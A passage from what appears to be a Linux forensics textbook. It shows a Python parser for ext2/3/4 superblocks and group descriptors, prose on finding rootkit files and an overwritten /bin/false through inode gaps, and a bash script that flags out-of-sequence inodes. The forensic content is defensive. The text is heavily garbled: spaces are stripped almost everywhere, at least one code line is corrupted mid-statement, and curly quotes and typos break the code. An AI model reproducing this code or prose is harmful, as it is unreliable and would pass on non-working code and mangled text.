retList.append(‘Recover’)

ifu32&0x8:

retList.append(‘JournalDevice’)

ifu32&0x10:

retList.append(‘MetaBlockGroups’)

ifu32&0x40:

retList.append(‘Extents’)

ifu32&0x80:

retList.append(‘64-bit’)

ifu32&0x100:

retList.append(‘MultipleMountProtection’)

ifu32&0x200:

retList.append(‘FlexibleBlockGroups’)

ifu32&0x400:

retList.append(‘ExtendedAttributesinInodes’)

ifu32&0x1000:

retList.append(‘DirectoryData’)

ifu32&0x2000:

retList.append(‘BlockGroupMetadataChecksum’)

ifu32&0x4000:

retList.append(‘LargeDirectory’)

ifu32&0x8000:

retList.append(‘InlineData’)

ifu32&0x10000:

retList.append(‘EncryptedInodes’)

returnretList

defgetReadonlyCompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘SparseSuper’)

ifu32&0x2:

retList.append(‘LargeFile’)

ifu32&0x4:

retList.append(‘BtreeDirectory’)

ifu32&0x8:

retList.append(‘HugeFile’)

ifu32&0x10:

retList.append(‘GroupDescriptorTableChecksum’)

ifu32&0x20:

retList.append(‘DirectoryNlink’)

ifu32&0x40:

retList.append(‘ExtraIsize’)

ifu32&0x80:

retList.append(‘HasSnapshot’)

ifu32&0x100:

retList.append(‘Quota’)

ifu32&0x200:

retList.append(‘BigAlloc’)

ifu32&0x400:

retList.append(‘MetadataChec2ksum’)

ifu32&0x800:

retList.append(‘Replica’)

ifu32&0x1000:

retList.append(‘Read-only’)

returnretList

“””

Thisclasswillparsethedatainasuperblock

fromanextended(ext2/ext3/ext4)Linuxfilesystem.

ItisuptodateasofJuly2015.

Usage:sb.Superblock(data)where

dataisapackedstringatleast1024bytes

longthatcontainsasuperblockinthefirst1024bytes.

sb.prettyPrint()printsoutallfieldsinthesuperblock.

“””

classSuperblock():

def__init__(self,data):

self.totalInodes=getU32(data)

self.totalBlocks=getU32(data,4)

self.restrictedBlocks=getU32(data,8)

self.freeBlocks=getU32(data,0xc)

self.freeInodes=getU32(data,0x10)

#normally0unlessblocksizeis<4k

self.firstDataBlock=getU32(data,0x14)

#blocksizeis1024*2^(whateverisinthisfield)

self.blockSize=pow(2,10+getU32(data,0x18))

#onlyusedifbigallocfeatureenabled

self.clusterSize=pow(2,getU32(data,0x1c))

self.blocksPerGroup=getU32(data,0x20)

#onlyusedifbigallocfeatureenabled

self.clustersPerGroup=getU32(data,0x24)

self.inodesPerGroup=getU32(data,0x28)

self.mountTime=time.gmtime(getU32(data,0x2c))

self.writeTime=time.gmtime(getU32(data,0x30))

#mountssincelastfsck

self.mountCount=getU16(data,0x34)

#mountsbetweenfsck

self.maxMountCount=getU16(data,0x36)

#shouldbe0xef53

self.magic=getU16(data,0x38)

#0001/0002/0004=cleanlyunmounted/errors/orphans

self.state=getU16(data,0x3a)

#whenerrors1/2/3continue/read-only/panic

self.errors=getU16(data,0x3c)

self.minorRevision=getU16(data,0x3e)

#lastfscktime

self.lastCheck=time.gmtime(getU32(data,0x40))

#secondsbetweenchecks

self.checkInterval=getU32(data,0x44)

#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites

self.creatorOs=getU32(data,0x48)

#0/1original/v2withdynamicinodesizes

self.revisionLevel=getU32(data,0x4c)

#UIDforreservedblocks

self.defaultResUid=getU16(data,0x50)

#GIDforreservedblocks

self.defaultRegGid=getU16(data,0x52)

#forExt4dynamicrevisionLevelsuperblocksonly!

#firstnon-reservedinode

self.firstInode=getU32(data,0x54)

#inodesizeinbytes

self.inodeSize=getU16(data,0x58)

#blockgroupthissuperblockisin

self.blockGroupNumber=getU16(data,0x5a)

#compatiblefeatures

self.compatibleFeatures=getU32(data,0x5c)

self.compatibleFeaturesList=\

getCompatibleFeaturesList(self.compatibleFeatures)

#incompatiblefeatures

self.incompatibleFeatures=getU32(data,0x60)

self.incompatibleFeaturesList=\

getIncompatibleFeaturesList(self.incompatibleFeatures)

#read-onlycompatiblefeatures

self.readOnlyCompatibleFeatures=getU32(data,0x64)

self.readOnlyCompatibleFeaturesList=\

getReadonlyCompatibleFeaturesList(self.readOnlyCompatibleFeatures)

#UUIDforvolumeleftasapackedstring

self.uuid=getU128(data,0x68)

#volumename-likelyempty

self.volumeName=data[0x78:0x88].split(“\x00”)[0]

#directorywherelastmounted

self.lastMounted=data[0x88:0xc8].split(“\x00”)[0]

#usedwithcompression

self.algorithmUsageBitmap=getU32(data,0xc8)

#notusedinext4

self.preallocBlocks=getU8(data,0xcc)

#onlyusedwithDIR_PREALLOCfeature

self.preallocDirBlock=getU8(data,0xcd)

#blocksreservedforfutureexpansion

self.reservedGdtBlocks=getU16(data,0xce)

#UUIDofjournalsuperblock

self.journalUuid=getU128(data,0xd0)

#inodenumberofjournalfile

self.journalInode=getU32(data,0xe0)

#devicenumberforjournalifexternaljournalused

self.journalDev=getU32(data,0xe4)

#startoflistoforphanedinodestodelete

self.lastOrphan=getU32(data,0xe8)

self.hashSeed=[]

#htreehashseed

self.hashSeed.append(getU32(data,0xec))

self.hashSeed.append(getU32(data,0xf0))

self.hashSeed.append(getU32(data,0xf4))

self.hashSeed.append(getU32(data,0xf8))

#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea

self.hashVersion=getU8(data,0xfc)

self.journalBackupType=getU8(data,0xfd)

#groupdescriptorsizeif64-bitfeatureenabled

self.descriptorSize=getU16(data,0xfe)

self.defaultMountOptions=getU32(data,0x100)

#onlyusedwithmetabgfeature

self.firstMetaBlockGroup=getU32(data,0x104)

#whenwasthefilesystemcreated

self.mkfsTime=time.gmtime(getU32(data,0x108))

self.journalBlocks=[]

#backupcopyofjournalinodesandsizeinlasttwoelements

foriinrange(0,17):

self.journalBlocks.append(getU32(data,0x10c+i*4))

#for64-bitmodeonly

self.blockCountHi=getU32(data,0x150)

self.reservedBlockCountHi=getU32(data,0x154)

self.freeBlocksHi=getU32(data,0x158)

#allinodessuchhaveatleastthismuchspace

self.minInodeExtraSize=getU16(data,0x15c)

#newinodesshouldreservethismanybytes

self.wantInodeExtraSize=getU16(data,0x15e)

#1/2/4signedhash/unsignedhash/testcode

self.miscFlags=getU32(data,0x160)

#logicalblocksreadfromdiskinRAIDbeforemovingtonextdisk

self.raidStride=getU16(data,0x164)

#secondstowaitbetweenmulti-mountchecks

self.mmpInterval=getU16(data,0x166)

#blocknumberforMMPdata

self.mmpBlock=getU64(data,0x168)

#howmanyblocksread/writetillbackonthisdisk

self.raidStripeWidth=getU32(data,0x170)

#groupsperflexgroup

self.groupsPerFlex=pow(2,getU8(data,0x174))

#shouldbe1forcrc32

self.metadataChecksumType=getU8(data,0x175)

#shouldbezeroes

self.reservedPad=getU16(data,0x176)

#kilobyteswrittenforalltime

self.kilobytesWritten=getU64(data,0x178)

#inodeofactivesnapshot

self.snapshotInode=getU32(data,0x180)

#idoftheactivesnapshot

self.snapshotId=getU32(data,0x184)

#blocksreservedforsnapshot

self.snapshotReservedBlocks=getU64(data,0x188)

#inodenumberofheadofsnapshotlist

self.snapshotList=getU32(data,0x190)

self.errorCount=getU32(data,0x194)

#timefirsterrordetected

self.firstErrorTime=time.gmtime(getU32(data,0x198))

#guiltyinode

self.firstErrorInode=getU32(data,0x19c)

#guiltyblock

self.firstErrorBlock=getU64(data,0x1a0)

#guiltyfunction

self.firstErrorFunction=\

data[0x1a8:0x1c8].split(“\x00”)[0]

#linenumberwhereerroroccurred

self.firstErrorLine=getU32(data,0x1c8)

#timelasterrordetected

self.lastErrorTime=time.gmtime(getU32(data,0x1cc))

#guiltyinode

self.lastErrorInode=getU32(data,0x1d0)

#linenumberwhereerroroccurred

self.lastErrorLine=getU32(data,0x1d4)

#guiltyblock

self.lastErrorBlock=getU64(data,0x1d8)

#guiltyfunction

self.lastErrorFunction=\

data[0x1e0:0x200].split(“\x00”)[0]

#mountoptionsinnull-terminatedstring

self.mountOptions=\

data[0x200:0x240].split(“\x00”)[0]

#inodeofuserquotafile

self.userQuotaInode=getU32(data,0x240)

#inodeofgroupquotafile

self.groupQuotaInode=getU32(data,0x244)

#shouldbezero

self.overheadBlocks=getU32(data,0x248)

#supersparse2only

self.backupBlockGroups=\

[getU32(data,0x24c),getU32(data,0x250)]

self.encryptionAlgorithms=[]

foriinrange(0,4):

self.encryptionAlgorithms.append(\

getU32(data,0x254+i*4))

self.checksum=getU32(data,0x3fc)

defblockGroups(self):

bg=self.totalBlocks/self.blocksPerGroup

ifself.totalBlocks%self.blocksPerGroup!=0:

bg+=1

returnbg

defgroupDescriptorSize(self):

if‘64-bit’inself.incompatibleFeaturesList:

return64

else:

return32

defprintState(self):

#0001/0002/0004=cleanlyunmounted/errors/orphans

retVal=“Unknown”

ifself.state==1:

retVal=“Cleanlyunmounted”

elifself.state==2:

retVal=“Errorsdetected”

elifself.state==4:

retVal=“Orphansbeingrecovered”

returnretVal

defprintErrorBehavior(self):

#whenerrors1/2/3continue/read-only/panic

retVal=“Unknown”

ifself.errors==1:

retVal=“Continue”

elifself.errors==2:

retVal=“Remountread-only”

elifself.errors==3:

retVal=“Kernelpanic”

returnretVal

defprintCreator(self):

#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites

retVal=“Unknown”

ifself.creatorOs==0:

retVal=“Linux”

elifself.creatorOs==1:

retVal=“Hurd”

elifself.creatorOs==2:

retVal=“Masix”

elifself.creatorOs==3:

retVal=“FreeBSD”

elifself.creatorOs==4:

retVal=“Lites”

returnretVal

defprintHashAlgorithm(self):

#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea

retVal=“Unknown”

ifself.hashVersion==0:

retVal=“Legacy”

elifself.hashVersion==1:

retVal=“HalfMD4”

elifself.hashVersion==2:

retVal=“Tea”32sion==3:

retVal=“UnsignedLegacy”

elifself.hashVersion==4:

retVal=“UnsignedHalfMD4”

elifself.hashVersion==5:

retVal=“UnsignedTea”

returnretVal

defprintEncryptionAlgorithms(self):

encList=[]

forvinself.encryptionAlgorithms:

ifv==1:

encList.append(‘256-bitAESinXTSmode’)

elifv==2:

encList.append(‘256-bitAESinGCMmode’)

elifv==3:

encList.append(‘256-bitAESinCBCmode’)

elifv==0:

pass

else:

encList.append(‘Unknown’)

returnencList

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

ifk==‘mountTime’ork==‘writeTime’or\

k==‘lastCheck’ork==‘mkfsTime’or\

k==‘firstErrorTime’ork==‘lastErrorTime’:

printk+”:”,time.asctime(v)

elifk==‘state’:

printk+”:”,self.printState()

elifk==‘errors’:

printk+”:”,self.printErrorBehavior()

elifk==‘uuid’ork==‘journalUuid’:

printk+”:”,printUuid(v)

elifk==‘creatorOs’:

printk+”:”,self.printCreator()

elifk==‘hashVersion’:

printk+”:”,self.printHashAlgorithm()

elifk==‘encryptionAlgorithms’:

printk+”:”,self.printEncryptionAlgorithms()

else:

printk+”:”,v

defgroupStartBlock(self,bgNo):

returnself.blocksPerGroup*bgNo

defgroupEndBlock(self,bgNo):

returnself.groupStartBlock(bgNo+1)-1

defgroupStartInode(self,bgNo):

returnself.inodesPerGroup*bgNo+1

defgroupEndInode(self,bgNo):

returnself.inodesPerGroup*(bgNo+1)

defgroupFromBlock(self,blockNo):

returnblockNo/self.blocksPerGroup

defgroupIndexFromBlock(self,blockNo):

returnblockNo%self.blocksPerGroup

defgroupFromInode(self,inodeNo):

return(inodeNo-1)/self.inodesPerGroup

defgroupIndexFromInode(self,inodeNo):

return(inodeNo-1)%self.inodesPerGroup

defgroupHasSuperblock(self,bgNo):

#blockgroupzeroalwayshasasuperblock

ifbgNo==0:

returnTrue

retVal=False

if‘MetaBlockGroups’inself.incompatibleFeaturesListand\

bgNo>=self.firstMetaBlockGroup:

#metablockgroupshaveasbandgdtin1stand

#2ndandlastofeachmetagroup

#metablockgroupsizeisblocksize/32

#onlypartoffilesystemmightusethisfeature

mbgSize=self.blockSize/32

retVal=(bgNo%mbgSize==0)or\

((bgNo+1)%mbgSize==0)or\

((bgNo-1)%mbgSize==0)

elif‘SparseSuper2’inself.compatibleFeaturesList:

#twobackupsuperblocksinself.backupBlockGroups

ifbgNo==self.backupBlockGroups[0]or\

bgNo==self.backupBlockGroups[1]:

retVal=True

elif‘SparseSuper’inself.readOnlyCompatibleFeaturesList:

#backupsin1,powersof3,5,and7

retVal=(bgNo==1)or\

(bgNo==pow(3,round(log(bgNo)/log(3))))\

or(bgNo==pow(5,round(log(bgNo)/log(5))))\

or(bgNo==pow(7,round(log(bgNo)/log(7))))

ifretVal:

returnretVal

else:

#ifwegotthisfarwemusthavedefault

#witheverybghavingsbandgdt

retVal=True

returnretVal

“””

Thisclassstorestherawgroupdescriptorsfrom

aLinuxextended(ext2/ext3/ext4)filesystem.It

islittlemorethanaglorifiedstructure.Both

32-bitand64-bit(wide)filesystemsaresupported.

ItisuptodateasofJuly2015.

Usage:gd=GroupDescriptor(data,wide)where

dataisa32bytegroupdescriptorifwideisfalse

or64bytegroupdescriptorifwideistrue.

gd.prettyPrint()printsallthefieldsinan

organizedmanner.

“””

classGroupDescriptor():

def__init__(self,data,wide=False):

self.wide=wide

#/*Blocksbitmapblock*/

self.blockBitmapLo=getU32(data)

#/*Inodesbitmapblock*/

self.inodeBitmapLo=getU32(data,4)

#/*Inodestableblock*/

self.inodeTableLo=getU32(data,8)

#/*Freeblockscount*/

self.freeBlocksCountLo=getU16(data,0xc)

#/*Freeinodescount*/

self.freeInodesCountLo=getU16(data,0xe)

#/*Directoriescount*/

self.usedDirsCountLo=getU16(data,0x10)

#/*EXT4_BG_flags(INODE_UNINIT,etc)*/

self.flags=getU16(data,0x12)

self.flagList=self.printFlagList()

#/*Excludebitmapforsnapshots*/

self.excludeBitmapLo=getU32(data,0x14)

#/*crc32c(s_uuid+grp_num+bbitmap)LE*/

self.blockBitmapCsumLo=getU16(data,0x18)

#/*crc32c(s_uuid+grp_num+ibitmap)LE*/

self.inodeBitmapCsumLo=getU16(data,0x1a)

#/*Unusedinodescount*/

self.itableUnusedLo=getU16(data,0x1c)

#/*crc16(sb_uuid+group+desc)*/

self.checksum=getU16(data,0x1e)

ifwide==True:

#/*BlocksbitmapblockMSB*/

self.blockBitmapHi=getU32(data,0x20)

#/*InodesbitmapblockMSB*/

self.inodeBitmapHi=getU32(data,0x24)

#/*InodestableblockMSB*/

self.inodeTableHi=getU32(data,0x28)

#/*FreeblockscountMSB*/

self.freeBlocksCountHi=getU16(data,0x2c)

#/*FreeinodescountMSB*/

self.freeInodesCountHi=getU16(data,0x2e)

#/*DirectoriescountMSB*/

self.usedDirsCountHi=getU16(data,0x30)

#/*UnusedinodescountMSB*/

self.itableUnusedHi=getU16(data,0x32)

#/*ExcludebitmapblockMSB*/

self.excludeBitmapHi=getU32(data,0x34)

#/*crc32c(s_uuid+grp_num+bbitmap)BE*/

self.blockBitmapCsumHi=getU16(data,0x38)

#/*crc32c(s_uuid+grp_num+ibitmap)BE*/

self.inodeBitmapCsumHi=getU16(data,0x3a)

self.reserved=getU32(data,0x3c)

defprintFlagList(self):

flagList=[]

#inodetableandbitmaparenotinitialized(EXT4_BG_INODE_UNINIT).

ifself.flags&0x1:

flagList.append(‘InodeUninitialized’)

#blockbitmapisnotinitialized(EXT4_BG_BLOCK_UNINIT).

ifself.flags&0x2:

flagList.append(‘BlockUninitialized’)

#inodetableiszeroed(EXT4_BG_INODE_ZEROED).

ifself.flags&0x4:

flagList.append(‘InodeZeroed’)

returnflagList

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

printk+”:”,v

“””

Thisclasscombinesinformatonfromtheblockgroupdescriptor

andthesuperblocktomorefullydescribetheblockgroup.It

isuptodateasofJuly2015.

Usageegd=ExtendedGroupDescriptor(bgd,sb,bgNo)where

bgdisaGroupDescriptorobject,sbisaSuperblockobject,

andbgNoisablockgroupnumber.

egd.prettyPrint()printsoutvariousstatisticsforthe

blockgroupandalsoitslayout.

“””

classExtendedGroupDescriptor():

def__init__(self,bgd,sb,bgNo):

self.blockGroup=bgNo

self.startBlock=sb.groupStartBlock(bgNo)

self.endBlock=sb.groupEndBlock(bgNo)

self.startInode=sb.groupStartInode(bgNo)

self.endInode=sb.groupEndInode(bgNo)

self.flags=bgd.printFlagList()

self.freeInodes=bgd.freeInodesCountLo

ifbgd.wide:

self.freeInodes+=bgd.freeInodesCountHi*pow(2,16)

self.freeBlocks=bgd.freeBlocksCountLo

ifbgd.wide:

self.freeBlocks+=bgd.freeBlocksCountHi*pow(2,16)

self.directories=bgd.usedDirsCountLo

ifbgd.wide:

self.directories+=bgd.usedDirsCountHi*pow(2,16)

self.checksum=bgd.checksum

self.blockBitmapChecksum=bgd.blockBitmapCsumLo

ifbgd.wide:

self.blockBitmapChecksum+=bgd.blockBitmapCsumHi*pow(2,16)

self.inodeBitmapChecksum=bgd.inodeBitmapCsumLo

ifbgd.wide:

self.inodeBitmapChecksum+=bgd.inodeBitmapCsumHi*pow(2,16)

#nowfigureoutthelayoutandstoreitinalist(withlistsinside)

self.layout=[]

self.nonDataBlocks=0

#forflexibleblockgroupsmustmakeanadjustment

fbgAdj=1

if‘FlexibleBlockGroups’insb.incompatibleFeaturesList:

#onlyfirstgroupinflexblockaffected

ifbgNo%sb.groupsPerFlex==0:

fbgAdj=sb.groupsPerFlex

ifsb.groupHasSuperblock(bgNo):

self.layout.append([‘Superblock’,self.startBlock,\

self.startBlock])

gdSize=sb.groupDescriptorSize()*sb.blockGroups()/

sb.blockSize

self.layout.append([‘GroupDescriptorTable’,\

self.startBlock+1,self.startBlock+gdSize])

self.nonDataBlocks+=gdSize+1

ifsb.reservedGdtBlocks>0:

self.layout.append([‘ReservedGDTBlocks’,\

self.startBlock+gdSize+1,\

self.startBlock+gdSize+sb.reservedGdtBlocks])

self.nonDataBlocks+=sb.reservedGdtBlocks

bbm=bgd.blockBitmapLo

ifbgd.wide:

bbm+=bgd.blockBitmapHi*pow(2,32)

self.layout.append([‘DataBlockBitmap’,bbm,bbm])

#isblockbitmapinthisgroup(notflexblockgroup,etc)

ifsb.groupFromBlock(bbm)==bgNo:

self.nonDataBlocks+=fbgAdj

ibm=bgd.inodeBitmapLo

ifbgd.wide:

ibm+=bgd.inodeBitmapHi*pow(2,32)

self.layout.append([‘InodeBitmap’,ibm,ibm])

#isinodebitmapinthisgroup?

ifsb.groupFromBlock(ibm)==bgNo:

self.nonDataBlocks+=fbgAdj

it=bgd.inodeTableLo

ifbgd.wide:

it+=bgd.inodeTableHi*pow(2,32)

itBlocks=(sb.inodesPerGroup*sb.inodeSize)/sb.blockSize

self.layout.append([‘InodeTable’,it,it+itBlocks-1])

#isinodetableinthisgroup?

ifsb.groupFromBlock(it)==bgNo:

self.nonDataBlocks+=itBlocks*fbgAdj

self.layout.append([‘DataBlocks’,self.startBlock\

+self.nonDataBlocks,self.endBlock])

defprettyPrint(self):

print“”

print‘BlockGroup:‘+str(self.blockGroup)

print‘Flags:%r‘%self.flags

print‘Blocks:%s-%s‘%(self.startBlock,self.endBlock)

print‘Inodes:%s-%s‘%(self.startInode,self.endInode)

print‘Layout:’

foriteminself.layout:

print‘%s%s-%s’%(item[0],item[1],item[2])

print‘FreeInodes:%u‘%self.freeInodes

print‘FreeBlocks:%u‘%self.freeBlocks

print‘Directories:%u‘%self.directories

print‘Checksum:0x%x‘%self.checksum

print‘BlockBitmapChecksum:0x%x‘%self.blockBitmapChecksum

print‘InodeBitmapChecksum:0x%x‘%self.inodeBitmapChecksum

“””

Thisclassreadsthesuperblockandblockgroupdescriptors

fromanimagefilecontainingaLinuxextended(ext2/ext3/ext4)

filesystemandthenstoresthefilesystemmetadatainanorganized

manner.ItisuptodateasofJuly2015.

Usage:emd=ExtMetadata(filename,offset)wherefilenameisa

rawimagefileandoffsetistheoffsetin512bytesectorsfrom

thestartofthefiletothefirstsectoroftheextendedfilesystem.

emd.prettyPrint()willprintoutthesuperblockinformationand

theniterateovereachblockgroupprintingstatisticsandlayout

information.

“””

classExtMetadata():

def__init__(self,filename,offset):

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+str(filename)+\

“cannotbeopennedforreading”)

exit(1)

withopen(str(filename),‘rb’)asf:

f.seek(1024+int(offset)*512)

sbRaw=str(f.read(1024))

self.superblock=Superblock(sbRaw)

#readblockgroupdescriptors

self.blockGroups=self.superblock.blockGroups()

ifself.superblock.descriptorSize!=0:

self.wideBlockGroups=True

self.blockGroupDescriptorSize=64

else:

self.wideBlockGroups=False

self.blockGroupDescriptorSize=32

#readingroupdescriptorsstartinginblock1

withopen(str(filename),‘rb’)asf:

f.seek(int(offset)*512+self.superblock.blockSize)

bgdRaw=str(f.read(self.blockGroups*\

self.blockGroupDescriptorSize))

self.bgdList=[]

foriinrange(0,self.blockGroups):

bgd=GroupDescriptor(bgdRaw[i*self.blockGroupDescriptorSize:]\

,self.wideBlockGroups)

ebgd=ExtendedGroupDescriptor(bgd,self.superblock,i)

self.bgdList.append(ebgd)

defprettyPrint(self):

self.superblock.prettyPrint()

forbgdinself.bgdList:

bgd.prettyPrint()

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offsetinsectors>\n”+\

“Readssuperblockfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

emd=ExtMetadata(sys.argv[1],sys.argv[2])

emd.prettyPrint()

if__name__==“__main__”:

main()

PartialresultsfromrunningthisscriptagainstthePFEsubjectsystemimageareshownin Figure 7.13, Figure 7.14, and Figure 7.15. In Figure 7.13we see that flexible blockgroupsareinuse.Notshowninthisfigureisaflexibleblockgroupsizeof16.InFigure7.14 the firstblockgroup is shown.As isalways thecase, it containsa superblockandgroup descriptor table (including the reserved blocks for future expansion). You willnotice that there are 16 blocks between the data bitmap and inode bitmap, and alsobetweentheinodebitmapandtheinodetable.Thisisduetothisbeingthefirstgroupinaflexible group (size=16) that houses these values for all block groups within the flexgroup.

FIGURE7.13

Resultofrunningtheextfs.pyscriptonthePFEsubjectsystem–Part1.

FIGURE7.14

Resultofrunningtheextfs.pyscriptonthePFEsubjectsystem–Part2.

InFigure7.15weseethatblockgroup3hasasuperblockandgroupdescriptor table.ThisisbecausetheSparseSuperfeatureisinusewhichstoresthesuperblockandgroupdescriptortableingroupsthatarepowersof3,5,or7.Ifyouexaminethefulloutputfrom

this command you will see that all of these backup superblocks and group descriptortablesareinthecorrectplaces.

FIGURE7.15

Resultofrunningtheextfs.pyscriptonthePFEsubjectsystem–Part3.

Beforewemoveontoanewtopic, I feel thatIshouldpointout thatwehavemerelyscratched the surface of what can be done with the classes found in this script. Forexample,theclassescouldeasilybeusedtocalculatetheoffsetintoanimageforagiveninodeordatablock.Itcouldalsobeusedtoworkbackwardfromanoffsettofigureoutwhat is stored in any given sector. Now that we have learned all of the basics of theextended filesystemswewillmoveon to discussinghowwemight detect an attacker’sactions,evenifheorshehasalteredtimestampsonthefilesystem.

FINDINGTHINGSTHATAREOUTOFPLACEThus far in this chapter we have seen a lot of theory on how the extended filesystemworks.Wecan leverage thatknowledge to find things that areoutofplaceornotquiteright.Afterall,thisisnormallywhattheforensicinvestigatorisafter.Inconsistenciesanduncommonsituationsoftenpointtoanattacker’sattempttohidehisorheractions.

Someofthesystemdirectoriessuchas/sbinand/binarehighlytargetedbyattackers.Eventhelowlylscommandcanoftenbeenoughtodetectalterationsinthesedirectories.Howcanwedetecttamperinginasystemdirectory?Whenthesystemisinstalled,filesinthe system directories are copied one after the other. As a result, the files are usuallystoredinsequentialinodes.Anythingaddedlaterbyanattackerwilllikelybeinahigherinodenumber.

Thecommandls-aliwilllistallfiles(-a)withalonglisting(-l)whichwillbegin

withaninodenumber(-i).Ifwetaketheresultsofthiscommandandpipethemtosort-n, theywillbesortednumerically(-n)by inodenumber.Theresultsofrunningls-alibin|sort-n fromwithin themountdirectory (subject’s rootdirectory)ofthePFEsubjectsystemareshowninFigure7.16.FilesassociatedwiththeXingYiQuanrootkit are highlighted.Notice that the inodes aremostly sequential and suddenly jumpfrom655,549to657,076whenthemalwarewasinstalled.

FIGURE7.16

Results of running ls -ali bin | sort -n on PFE subject image. The highlighted files are from a rootkitinstallation.

Some readers may have expected the inode numbers to be considerably higher. Theprimaryreasons that theyareonlya fewthousand inodesaway is thatLinuxwilldo itsbest to store files in a given directory in the same block group.Onlywhen there is nospaceinthecontainingdirectoriesblockgroupwillthefilebestoredelsewhere.Thisisaperformanceoptimizationthatattemptstominimizemovementoftheread/writeheadsonaharddrive.

Inthiscasetheattackerdidnotattempttoalterthetimestampsontherootkitfiles.Therearemanytoolsthatwillallowyoutoeasilymodifythesetimestamps.Theimportantthingtorealizeisthatnomatterwhatyoudotothetimestamps,theinodeswillrevealrecentlyaddedfileseverytime.

Thelscommandsupportsafewbasicsorts.Thedefaultsortisalphabetical,butitwillalso sort by extension, size, time, and version. The command ls -aliR<directory>–sort=sizewillperformarecursive(-R)listingofadirectorywitheverythingsortedbysize(largesttosmallest).Partialresultsofrunningls-aliRbin–sort=sizeareshowninFigure7.17.

FIGURE7.17

Partialresultsofrunningls-aliRbin–sort=sizeagainstthePFEsubjectimage.

Havea lookat thehighlighted filesbashand false fromFigure7.17.Noticeanythingunusual?Theonly thing /bin/falsedoes is return thevaluefalsewhencalled.Yet this isoneofthethreelargestfilesinthe/bindirectory.Itisalsosuspiciouslytheexactsamesizeas/bin/bash.Whatappearstohavehappenedhereisthattheattackercopied/bin/bashontopof/bin/falseinanattempttologinwithsystemaccounts.Noticethatthisattackerwasnotterriblysophisticatedasevidencedbythefactthattheydidn’tchangethetimestampon/bin/falsewhentheyweredone.

Becausetheattackerfailedtomodifythetimestamps,alistingsortedbytimewillalsoshowwhathashappenedprettyclearly.Apartial listingof results from thels-aliRbin–sort=time command is shown inFigure7.18.Thehighlightedportion showsboththerootkitfilesandtherecentlyaltered/bin/false.

FIGURE7.18

Partialresultsfromrunningls-aliRbin–sort=timeagainstthePFEsubjectimage.

Theadvantageofrunningthelscommandasshowninthissectionisthatitissimple.Thedownsideisthatyouhavetocarefullyscrutinizetheoutputtodetectanygapsintheinodenumbers.Somereadersmighthaveseenmonthlybankstatements that list checksthathavebeencashedagainsttheaccountlistedinorderwithanotationifachecknumberismissing.

Wouldn’t it be great ifwe could have a shell script that did something similar to thebank statement?Well, youare in luck, sucha script follows.Youare extra fortunate astherearesomenewshellscriptingtechniquesusedinthisscript.#!/bin/bash

#

#out-of-seq-inodes.sh

#

#Simplescripttolistoutof

#sequenceinodes.

#Intendedtobeusedaspartof

#aforensicsinvestigation.

#AsdevelopedforPentesterAcademy.com

#byDr.PhilPolstra(@ppolstra)

usage(){

echo“Usage:$0<path>”

echo“Simplescripttolistadirectoryandprintawarningif”

echo“theinodesareoutofsequenceaswillhappenifsystem”

echo“binariesareoverwritten.”

exit1

}

if[$#-lt1];then

usage

fi

#outputalistingsortedbyinodenumbertoatempfile

templs=’/tmp/temp-ls.txt’

ls-ali$1|sort-n>$templs

#thisisfordiscardingfirstcouplelinesinoutput

foundfirstinode=false

declare-istartinode

whilereadline

do

#thereisusuallyalineortwoofnon-filestuffatstartofoutput

#theifstatementhelpsusgetpastthat

if[“$foundfirstinode”=false]\

&&[“\echo$line|wc-w\”-gt6];then

startinode=`expr$(echo$line|awk‘{print$1}’)`

echo“Startinode=$startinode”

foundfirstinode=true

fi

q=$(echo$line|awk‘{print$1}’)

if[[$q=~^[0-9]+$]]&&\

[“$startinode”-lt$q];

then

if[$((startinode+2))-lt$q];then

echo-e“\e[31m****OutofSequenceinodedetected****\

expect$startinodegot$q\e[0m”

else

echo-e“\e[33m****OutofSequenceinodedetected****\

expect$startinodegot$q\e[0m”

fi

#resetthestartinodetopointtothisvaluefornextentry

startinode=`expr$(echo$line|awk‘{print$1}’)`

fi

echo“$line”

startinode=$((startinode+1))

done<$templs

rm$templs

Thescriptstartswiththeusualshe-bang,followedbyausagefunctionwhichiscalledwhennocommandlineargumentswerepassedin.Toimproveperformanceandalsomakethescriptsimpler,theoutputfromls-ali<directory>|sort-nissenttoatemporary file. Two variables foundfirstinode and startinode are created. The linedeclare-istartinodeisnew.Thislinecreatesanewvariablethatisanintegervalue.Italsosetsthevariabletozero.Wewillseelaterinthescriptwhythisisneeded.

Thelinewhilereadlinebeginsadoloop.Youmightwonderwherethislineiscoming from. If you look down a few lines, you will see a line that reads done <$templs.Thisconstructredirectsthetemporaryfiletobeinputfortheloop.Essentially,thisdoloopreadsthetemporaryfilelinebylineandperformstheactionslistedwithintheloopcode.

Theifblockatthestartofthedoloopisusedtoconsumeanyheadersoutputbyls.Theifhastwotestsandedtogetherwiththe&&operator.Thefirsttestcheckstoseeiffoundfirstinodeisfalsewhichindicateswehavenotmadeitpastanyheaderlinestotheactualfiledatayet.Thesecondtestexecutesthecommandecho$line|wc-wandtestsiftheresultisgreaterthansix.Recallthatenclosingacommandinbacktickscausesit to be executed and the results converted to a string. This command echoes the linewhichispipedtothewordcountutility,wc.Normallythisutilitywillprintoutcharacters,words, and lines, but the -w option causes only words to be printed. Any output linespertainingtofileswillhaveatleastsevenwords.Ifthisisthecasethestartinodevariableisset,amessageisechoedtothescreen,andfoundfirstinodeissettotrue;

The linestartinode=`expr$(echo$line|awk‘{print$1}’)` iseasier to understand if you work from the parentheses outward. The command echo$line|awk‘{print$1}’echoesthelineandpipesittoawkwhichthenprintsthefirstword(startofthelineuptothefirstwhitespacecharacter).Recallthattheinodenumberislistedfirstbythelscommand.Thisinodenumberthengetspassedtoexpr<inodenumber>which is executedbecause it is enclosed in back ticks.This inodenumberisstoredintheintegervariablestartinodewhichwasdeclaredearlierinthescript.

